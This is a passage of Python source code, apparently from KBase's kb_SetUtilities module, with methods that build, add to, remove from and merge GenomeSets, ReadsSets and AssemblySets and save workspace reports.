'{}' for ref: '{}'\"\n raise ValueError(errMsg.format(type_name, genomeRef))\n\n if type_name == 'Genome':\n genome_id = genomeObj['id']\n else:\n genome_id = genomeObj['genome_annotation_id']\n genome_sci_name = genomeObj['scientific_name']\n\n if genomeRef not in list(elements.keys()):\n elements[genomeRef] = dict()\n elements[genomeRef]['ref'] = genomeRef # the key line\n self.log(console, \"adding element {} ({}) aka ({}): {}\".format(obj_name,\n genome_sci_name,\n genome_id,\n genomeRef))\n\n # set provenance\n self.log(console, \"SETTING PROVENANCE\")\n input_ws_obj_refs = params['input_refs']\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Build_GenomeSet')\n\n # Store output object\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING GENOMESET\")\n output_GenomeSet = {'description': params['desc'],\n 'elements': elements}\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{'type': 'KBaseSearch.GenomeSet',\n 'data': output_GenomeSet,\n 'name': params['output_name'],\n 'meta': {},\n 'provenance': provenance}]})[0]\n\n # build output report object\n #\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"genomes in output set \" + params['output_name'] +\n \": \" + str(len(list(elements.keys()))))\n report += 'genomes in output set ' + params['output_name'] + ': '\n report += str(len(list(elements.keys()))) + \"\\n\"\n reportObj = {\n 'objects_created': [{'ref': params['workspace_name'] + '/' + params['output_name'],\n 'description':'KButil_Build_GenomeSet'}],\n 'text_message': report\n }\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {'objects_created': [],\n 'text_message': report}\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Build_GenomeSet DONE\")\n #END KButil_Build_GenomeSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Build_GenomeSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Build_GenomeSet_from_FeatureSet(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Build_GenomeSet_from_FeatureSet_Params\"\n (KButil_Build_GenomeSet_from_FeatureSet() ** ** Method for\n obtaining a GenomeSet from a FeatureSet) -> structure: parameter\n \"workspace_name\" of type \"workspace_name\" (** The workspace object\n refs are of form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_ref\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type\n \"KButil_Build_GenomeSet_from_FeatureSet_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Build_GenomeSet_from_FeatureSet\n console = []\n invalid_msgs = []\n self.log(console, 'Running KButil_Build_GenomeSet_from_FeatureSet with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_ref',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Built GenomeSet'\n\n # Obtain FeatureSet\n (featureSet,\n info,\n obj_name,\n type_name) = self.get_obj_data(params['input_ref'], 'featureSet')\n\n if type_name != 'FeatureSet':\n raise ValueError(\"Bad Type: Should be FeatureSet instead of '\" + type_name + \"'\")\n\n # Build GenomeSet\n elements = {}\n genome_seen = dict()\n\n for fId in list(featureSet['elements'].keys()):\n for genomeRef in featureSet['elements'][fId]:\n\n if not genome_seen.get(genomeRef):\n genome_seen[genomeRef] = True\n\n (genomeObj,\n info,\n obj_name,\n type_name) = self.get_obj_data(genomeRef, 'genome')\n\n if type_name == 'AnnotatedMetagenomeAssembly':\n self.log(console, \"SKIPPING AnnotatedMetagenomeAssembly Object \"+obj_name)\n continue\n elif type_name != 'Genome' and type_name != 'GenomeAnnotaton':\n errMsg = \"Bad Type: Should be Genome or GenomeAnnotation instead\"\n errMsg += \" of '{}' for ref: '{}'\"\n raise ValueError(errMsg.format(type_name, genomeRef))\n\n if type_name == 'Genome':\n genome_id = genomeObj['id']\n else:\n genome_id = genomeObj['genome_annotation_id']\n genome_sci_name = genomeObj['scientific_name']\n\n #if not genome_id in elements.keys():\n # elements[genome_id] = dict()\n #elements[genome_id]['ref'] = genomeRef # the key line\n if genomeRef not in list(elements.keys()):\n elements[genomeRef] = dict()\n elements[genomeRef]['ref'] = genomeRef # the key line\n self.log(console, \"adding element {} ({}/{}) : {}\".format(obj_name,\n genome_sci_name,\n genome_id,\n genomeRef))\n\n # set provenance\n self.log(console, \"SETTING PROVENANCE\")\n input_ws_obj_refs = [params['input_ref']]\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Build_GenomeSet_from_FeatureSet')\n\n # Store output object\n #\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING GENOMESET\")\n output_GenomeSet = {'description': params['desc'],\n 'elements': elements}\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{'type': 'KBaseSearch.GenomeSet',\n 'data': output_GenomeSet,\n 'name': params['output_name'],\n 'meta': {},\n 'provenance': provenance}]})[0]\n \n # build output report object\n #\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"genomes in output set \" + params['output_name'] + \": \" +\n str(len(list(elements.keys()))))\n report += 'genomes in output set {}:{}\\n'.format(params['output_name'],\n len(list(elements.keys())))\n ref = \"{}/{}\".format(params['workspace_name'], params['output_name'])\n reportObj = {'objects_created': [{'ref': ref,\n 'description': 'KButil_Build_GenomeSet_from_FeatureSet'}],\n 'text_message': report}\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {'objects_created': [],\n 'text_message': report}\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Build_GenomeSet_from_FeatureSet DONE\")\n #END KButil_Build_GenomeSet_from_FeatureSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Build_GenomeSet_from_FeatureSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Add_Genomes_to_GenomeSet(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Add_Genomes_to_GenomeSet_Params\"\n (KButil_Add_Genomes_to_GenomeSet() ** ** Method for adding a\n Genome to a GenomeSet) -> structure: parameter \"workspace_name\" of\n type \"workspace_name\" (** The workspace object refs are of form:\n ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_genome_refs\" of list of type \"data_obj_ref\",\n parameter \"input_genomeset_ref\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Add_Genomes_to_GenomeSet_Output\"\n -> structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Add_Genomes_to_GenomeSet\n\n # init\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n console = []\n invalid_msgs = []\n self.log(console, 'Running KButil_Add_Genomes_to_GenomeSet with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_genome_refs',\n 'input_genomeset_ref',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Increased GenomeSet'\n\n # Build GenomeSet\n elements = dict()\n query_genome_ref_order = []\n \n # add old GenomeSet\n #\n if 'input_genomeset_ref' in params and params['input_genomeset_ref'] is not None:\n (genomeSet,\n info,\n obj_name,\n type_name) = self.get_obj_data(params['input_genomeset_ref'], 'genomeSet')\n\n if type_name != 'GenomeSet':\n raise ValueError(\"Bad Type: Should be GenomeSet instead of '\" + type_name + \"'\")\n\n for gId in list(genomeSet['elements'].keys()):\n genomeRef = genomeSet['elements'][gId]['ref']\n\n if not elements.get(genomeRef):\n elements[genomeRef] = dict()\n elements[genomeRef]['ref'] = genomeRef # the key line\n self.log(console, \"adding element \" + gId + \" : \" + genomeRef)\n\n query_genome_ref_order.append(genomeRef)\n \n\n # add new genomes\n #\n genomeSet_obj_types = [\"KBaseSearch.GenomeSet\", \"KBaseSets.GenomeSet\"]\n genome_obj_types = [\"KBaseGenomes.Genome\", \"KBaseGenomeAnnotations.Genome\"]\n tree_obj_types = [\"KBaseTrees.Tree\"]\n for input_ref in params['input_genome_refs']:\n\n (query_genome_obj_data,\n query_genome_obj_info,\n query_genome_obj_name,\n query_genome_obj_type) = self.get_obj_data(input_ref, 'genome or genomeSet', full_type=True)\n\n # just a genome\n if query_genome_obj_type in genome_obj_types:\n if input_ref not in elements:\n elements[input_ref] = dict()\n elements[input_ref]['ref'] = input_ref # the key line\n self.log(console, \"adding element \" + input_ref)\n query_genome_ref_order.append(input_ref)\n\n # handle genomeSet\n elif query_genome_obj_type in genomeSet_obj_types:\n for genome_id in sorted(query_genome_obj_data['elements'].keys()):\n genome_ref = query_genome_obj_data['elements'][genome_id]['ref']\n if genome_ref not in elements:\n elements[genome_ref] = dict()\n elements[genome_ref]['ref'] = genome_ref # the key line\n self.log(console, \"adding element \" + genome_ref)\n query_genome_ref_order.append(genome_ref)\n\n # handle tree type\n elif query_genome_obj_type in tree_obj_types:\n for genome_id in sorted(query_genome_obj_data['ws_refs'].keys()):\n genome_ref = query_genome_obj_data['ws_refs'][genome_id]['g'][0]\n if genome_ref not in elements:\n elements[genome_ref] = dict()\n elements[genome_ref]['ref'] = genome_ref # the key line\n self.log(console, \"adding element \" + genome_ref)\n query_genome_ref_order.append(genome_ref)\n else: \n raise ValueError (\"bad type for input_genome_refs\")\n\n\n # set provenance\n self.log(console, \"SETTING PROVENANCE\")\n input_ws_obj_refs = [params['input_genomeset_ref']]\n input_ws_obj_refs.extend(params['input_genome_refs'])\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Add_Genomes_to_GenomeSet')\n\n # Store output object\n #\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING GENOMESET\")\n output_GenomeSet = {'description': params['desc'],\n 'elements': elements}\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{\n 'type': 'KBaseSearch.GenomeSet',\n 'data': output_GenomeSet,\n 'name': params['output_name'],\n 'meta': {},\n 'provenance': provenance}]})[0]\n\n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"genomes in output set \" + params['output_name'] + \": \" +\n str(len(list(elements.keys()))))\n report += 'genomes in output set ' + params['output_name'] + ': '\n report += str(len(list(elements.keys()))) + \"\\n\"\n reportObj = {\n 'objects_created': [{'ref': params['workspace_name'] + '/' + params['output_name'],\n 'description':'KButil_Add_Genomes_to_GenomeSet'}],\n 'text_message': report}\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {'objects_created': [],\n 'text_message': report}\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Add_Genomes_to_GenomeSet DONE\")\n #END KButil_Add_Genomes_to_GenomeSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Add_Genomes_to_GenomeSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Remove_Genomes_from_GenomeSet(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Remove_Genomes_from_GenomeSet_Params\"\n (KButil_Remove_Genomes_from_GenomeSet() ** ** Method for removing\n Genomes from a GenomeSet) -> structure: parameter \"workspace_name\"\n of type \"workspace_name\" (** The workspace object refs are of\n form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_genome_refs\" of list of type \"data_obj_ref\",\n parameter \"nonlocal_genome_names\" of list of type \"data_obj_name\",\n parameter \"input_genomeset_ref\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type\n \"KButil_Remove_Genomes_from_GenomeSet_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Remove_Genomes_from_GenomeSet\n\n # init\n console = []\n invalid_msgs = []\n self.log(console, 'Running KButil_Remove_Genomes_from_GenomeSet with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n\n\n # check params\n required_params = ['workspace_name',\n 'input_genomeset_ref',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Reduced GenomeSet'\n if not params.get('input_genome_refs') and \\\n not params.get('nonlocal_genome_names'):\n raise ValueError('must define either Local genomes or Non-local genomes to remove')\n\n \n # read orig GenomeSet\n #\n genomeSet_workspace = None\n if 'input_genomeset_ref' in params and params['input_genomeset_ref'] is not None:\n\n (genomeSet,\n info,\n obj_name,\n type_name) = self.get_obj_data(params['input_genomeset_ref'], 'genomeSet')\n\n if type_name != 'GenomeSet':\n raise ValueError(\"Bad Type: Should be GenomeSet instead of '\" + type_name + \"'\")\n genomeSet_workspace = info[WORKSPACE_I]\n\n\n # Build list of genome refs (without version) to skip.\n # Note: standardize to workspace_name and obj_id\n skip_genomes_by_ref = dict()\n nonlocal_skip_genome_refs = []\n if params.get('input_genome_refs'):\n for genomeRef in params['input_genome_refs']: \n (this_obj_info,\n this_obj_name,\n this_obj_type) = self.get_obj_info(genomeRef, 'genome')\n\n standardized_genomeRef = self.get_obj_ref_from_obj_info_noVer(this_obj_info)\n skip_genomes_by_ref[standardized_genomeRef] = True\n if params.get('nonlocal_genome_names'):\n for gId in list(genomeSet['elements'].keys()):\n genomeRef = genomeSet['elements'][gId]['ref']\n (genome_obj_info,\n this_genome_objname,\n type_name) = self.get_obj_info(genomeRef, 'genome')\n\n this_genome_workspace = genome_obj_info[WORKSPACE_I]\n standardized_genomeRef = self.get_obj_ref_from_obj_info_noVer(genome_obj_info)\n if this_genome_workspace != genomeSet_workspace \\\n and this_genome_objname in params['nonlocal_genome_names']:\n skip_genomes_by_ref[standardized_genomeRef] = True\n nonlocal_skip_genome_refs.append(standardized_genomeRef)\n \n # build new genome set without skip genomes\n elements = dict()\n for gId in list(genomeSet['elements'].keys()):\n genomeRef = genomeSet['elements'][gId]['ref']\n (this_obj_info,\n this_genome_obj_name,\n this_genome_obj_type) = self.get_obj_info(genomeRef, 'genome')\n\n standardized_genomeRef = self.get_obj_ref_from_obj_info_noVer(this_obj_info)\n\n # this is where they are removed\n if not skip_genomes_by_ref.get(standardized_genomeRef):\n elements[gId] = dict()\n elements[gId]['ref'] = genomeRef # the key line\n self.log(console, \"keeping element \" + gId + \" : \" + genomeRef)\n else:\n self.log(console, \"removing element \" + gId + \" : \" + genomeRef)\n\n # set provenance\n self.log(console, \"SETTING PROVENANCE\")\n input_ws_obj_refs = [params['input_genomeset_ref']]\n input_ws_obj_refs.extend(params['input_genome_refs'])\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Remove_Genomes_from_GenomeSet')\n\n # Store output object\n #\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING GENOMESET\")\n output_GenomeSet = {'description': params['desc'],\n 'elements': elements}\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{\n 'type': 'KBaseSearch.GenomeSet',\n 'data': output_GenomeSet,\n 'name': params['output_name'],\n 'meta': {},\n 'provenance': provenance}]})[0]\n\n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"genomes in output set \" + params['output_name'] + \": \" +\n str(len(list(elements.keys()))))\n report += 'genomes in output set ' + params['output_name'] + ': '\n report += str(len(list(elements.keys()))) + \"\\n\"\n reportObj = {\n 'objects_created': [{'ref': params['workspace_name'] + '/' + params['output_name'],\n 'description':'KButil_Remove_Genomes_from_GenomeSet'}],\n 'text_message': report}\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {'objects_created': [],\n 'text_message': report}\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Remove_Genomes_from_GenomeSet DONE\")\n #END KButil_Remove_Genomes_from_GenomeSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Remove_Genomes_from_GenomeSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Build_ReadsSet(self, ctx, params):\n \"\"\"\n :param params: instance of type \"KButil_Build_ReadsSet_Params\"\n (KButil_Build_ReadsSet() ** ** Method for creating a ReadsSet) ->\n structure: parameter \"workspace_name\" of type \"workspace_name\" (**\n The workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Build_ReadsSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Build_ReadsSet\n console = []\n invalid_msgs = []\n self.log(console,'Running KButil_Build_ReadsSet with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Built ReadsSet'\n\n \n # clean input_refs\n clean_input_refs = []\n for ref in params['input_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_refs'] = clean_input_refs\n\n if len(params['input_refs']) < 1:\n self.log(console,\"Must provide at least one Reads Lib\")\n self.log(invalid_msgs,\"Must provide at least one Reads Lib\")\n\n # Build ReadsSet\n #\n items = []\n lib_seen = dict()\n set_type = None\n\n for libRef in params['input_refs']:\n\n if not lib_seen.get(libRef):\n lib_seen[libRef] = True\n\n (libObj,\n info,\n lib_name,\n lib_type) = self.get_obj_data(libRef, 'reads library')\n\n if set_type is None:\n set_type = lib_type\n elif lib_type != set_type:\n raise ValueError(\"Don't currently support heterogeneous ReadsSets\"+\n \" (e.g. PairedEndLibrary and SingleEndLibrary).\" +\n \" You have more than one type in your input\")\n\n if lib_type != 'SingleEndLibrary' and lib_type != 'PairedEndLibrary':\n errMsg = \"Bad Type: Should be SingleEndLibrary or PairedEndLibrary instead of \"\n errMsg += \"'{}' for ref: '{}'\"\n raise ValueError(errMsg.format(lib_type, libRef))\n\n # add lib\n self.log(console, \"adding lib \" + lib_name + \" : \" + libRef)\n items.append({'ref': libRef, 'label': lib_name})\n\n\n # Store output object\n #\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING READS_SET\")\n\n output_readsSet_obj = {'description': params['desc'],\n 'items': items}\n output_readsSet_name = params['output_name']\n try:\n rSet_ref = self.setAPI_Client.save_reads_set_v1(\n {'workspace_name': params['workspace_name'],\n 'output_object_name': output_readsSet_name,\n 'data': output_readsSet_obj})['set_ref']\n except Exception as e:\n errMsg = 'SetAPI Error: Unable to save read library set obj to workspace: ({})\\n{}'\n raise ValueError(errMsg.format(params['workspace_name'], str(e)))\n\n # build output report object\n #\n self.log(console, \"SAVING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"reads libs in output set \" + params['output_name'] + \": \" +\n str(len(params['input_refs'])))\n report += 'reads libs in output set ' + params['output_name'] + ': ' + str(\n len(params['input_refs']))\n reportObj = {\n 'objects_created': [{'ref': params['workspace_name'] + '/' + params['output_name'],\n 'description': 'KButil_Build_ReadsSet'}],\n 'text_message': report}\n else:\n report += \"FAILURE:\\n\\n\"+\"\\n\".join(invalid_msgs)+\"\\n\"\n reportObj = {'objects_created': [], 'text_message': report}\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Build_ReadsSet DONE\")\n #END KButil_Build_ReadsSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Build_ReadsSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Merge_MultipleReadsSets_to_OneReadsSet(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Merge_MultipleReadsSets_to_OneReadsSet_Params\"\n (KButil_Merge_MultipleReadsSets_to_OneReadsSet() ** ** Method for\n merging multiple ReadsSets into one ReadsSet) -> structure:\n parameter \"workspace_name\" of type \"workspace_name\" (** The\n workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type\n \"KButil_Merge_MultipleReadsSets_to_OneReadsSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Merge_MultipleReadsSets_to_OneReadsSet\n console = []\n report = ''\n self.log(console, 'Running KButil_Merge_MultipleReadsSets_to_OneReadsSet with parameters: ')\n self.log(console, \"\\n\"+pformat(params))\n\n # check params\n required_params = ['workspace_name',\n 'input_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n\n # clean input_refs\n clean_input_refs = []\n for ref in params['input_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_refs'] = clean_input_refs\n\n if len(params['input_refs']) < 2:\n self.log(console,\"Must provide at least two ReadsSets\")\n self.log(invalid_msgs,\"Must provide at least two ReadsSets\")\n\n # init output object fields and SetAPI\n combined_readsSet_ref_list = []\n combined_readsSet_name_list = []\n combined_readsSet_label_list = []\n\n # Iterate through list of ReadsSets\n #\n reads_lib_type = None\n reads_lib_ref_seen = dict()\n accepted_libs = []\n repeat_libs = []\n for set_i,this_readsSet_ref in enumerate(params['input_refs']):\n accepted_libs.append([])\n repeat_libs.append([])\n\n (input_reads_obj_info,\n input_reads_obj_name,\n input_reads_obj_type) = self.get_obj_info(this_readsSet_ref, 'reads set', full_type=True)\n \n acceptable_types = [\"KBaseSets.ReadsSet\"]\n if input_reads_obj_type not in acceptable_types:\n raise ValueError(\"Input reads of type: '\" + input_reads_obj_type +\n \"'. Must be one of \" + \", \".join(acceptable_types))\n\n # iterate through read libraries in read set and add new ones to combined ReadsSet\n try:\n input_readsSet_obj = self.setAPI_Client.get_reads_set_v1({\n 'ref': this_readsSet_ref,\n 'include_item_info': 1})\n except Exception as e:\n raise ValueError('SetAPI Error: Unable to get read library set from workspace: (' +\n this_readsSet_ref + \")\\n\" + str(e))\n\n for readsLibrary_obj in input_readsSet_obj['data']['items']:\n this_readsLib_ref = readsLibrary_obj['ref']\n this_readsLib_label = readsLibrary_obj['label']\n (this_readsLib_name, this_readsLib_type) = self.get_obj_name_and_type_from_obj_info (readsLibrary_obj['info'])\n if reads_lib_type is None:\n reads_lib_type = this_readsLib_type\n elif this_readsLib_type != reads_lib_type:\n raise ValueError (\"inconsistent reads library types in ReadsSets. \" +\n \"Must all be PairedEndLibrary or SingleEndLibrary to merge\")\n\n if this_readsLib_ref not in reads_lib_ref_seen:\n reads_lib_ref_seen[this_readsLib_ref] = True\n combined_readsSet_ref_list.append(this_readsLib_ref)\n combined_readsSet_label_list.append(this_readsLib_label)\n combined_readsSet_name_list.append(this_readsLib_name)\n accepted_libs[set_i].append(this_readsLib_ref)\n else:\n repeat_libs[set_i].append(this_readsLib_ref)\n\n # Save Merged ReadsSet\n #\n items = []\n for lib_i,lib_ref in enumerate(combined_readsSet_ref_list):\n items.append({'ref': lib_ref,\n 'label': combined_readsSet_label_list[lib_i]\n #'data_attachment': ,\n #'info':\n })\n output_readsSet_obj = { 'description': params['desc'],\n 'items': items\n }\n output_readsSet_name = params['output_name']\n try:\n output_readsSet_ref = self.setAPI_Client.save_reads_set_v1 ({'workspace_name': params['workspace_name'],\n 'output_object_name': output_readsSet_name,\n 'data': output_readsSet_obj\n })['set_ref']\n except Exception as e:\n raise ValueError('SetAPI FAILURE: Unable to save read library set object to workspace: (' + params['workspace_name']+\")\\n\" + str(e))\n\n\n # build report\n #\n self.log (console, \"SAVING REPORT\")\n report += \"TOTAL READS LIBRARIES COMBINED INTO ONE READS SET: \"+ str(len(combined_readsSet_ref_list))+\"\\n\"\n for set_i,this_readsLib_ref in enumerate(params['input_refs']):\n report += \"READS LIBRARIES ACCEPTED FROM ReadsSet \"+str(set_i)+\": \"+str(len(accepted_libs[set_i]))+\"\\n\"\n report += \"READS LIBRARIES REPEAT FROM ReadsSet \"+str(set_i)+\": \"+str(len(repeat_libs[set_i]))+\"\\n\"\n report += \"\\n\"\n reportObj = {'objects_created':[],\n 'text_message': report}\n\n reportObj['objects_created'].append({'ref':output_readsSet_ref,\n 'description':params['desc']})\n\n\n # save report object\n #\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console,\"KButil_Merge_MultipleReadsSets_to_OneReadsSet DONE\")\n #END KButil_Merge_MultipleReadsSets_to_OneReadsSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Merge_MultipleReadsSets_to_OneReadsSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Build_AssemblySet(self, ctx, params):\n \"\"\"\n :param params: instance of type \"KButil_Build_AssemblySet_Params\"\n (KButil_Build_AssemblySet() ** ** Method for creating an\n AssemblySet) -> structure: parameter \"workspace_name\" of type\n \"workspace_name\" (** The workspace object refs are of form: ** ** \n objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Build_AssemblySet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Build_AssemblySet\n console = []\n invalid_msgs = []\n self.log(console,'Running KButil_Build_AssemblySet with params=')\n self.log(console, \"\\n\"+pformat(params))\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Built AssemblySet'\n\n \n # clean input_refs\n clean_input_refs = []\n for ref in params['input_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_refs'] = clean_input_refs\n\n if len(params['input_refs']) < 1:\n self.log(console,\"Must provide at least one Assembly\")\n self.log(invalid_msgs,\"Must provide at least one Assembly\")\n\n\n # Build AssemblySet\n #\n items = []\n ass_seen = dict()\n set_type = None\n\n for assRef in params['input_refs']:\n\n if not 